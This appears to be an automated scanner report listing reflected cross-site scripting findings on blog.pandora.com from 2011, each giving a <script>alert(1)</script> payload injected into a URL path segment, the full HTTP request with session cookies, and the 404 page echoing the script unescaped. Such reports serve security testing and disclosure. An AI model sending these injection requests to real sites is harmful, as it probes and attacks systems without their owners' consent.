The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3dbfc<script>alert(1)</script>cae8c69d562 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20063dbfc<script>alert(1)</script>cae8c69d562/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c455f<script>alert(1)</script>b6d36241d5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/06c455f<script>alert(1)</script>b6d36241d5f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd617<script>alert(1)</script>7f88e7ca374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafd617<script>alert(1)</script>7f88e7ca374/archives/2006/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec7f7<script>alert(1)</script>d0c5fa2a196 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesec7f7<script>alert(1)</script>d0c5fa2a196/2006/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23e21<script>alert(1)</script>f8392586fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:21 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200623e21<script>alert(1)</script>f8392586fa0/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1665f<script>alert(1)</script>f197cc616af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/071665f<script>alert(1)</script>f197cc616af/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e163<script>alert(1)</script>746a263de0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
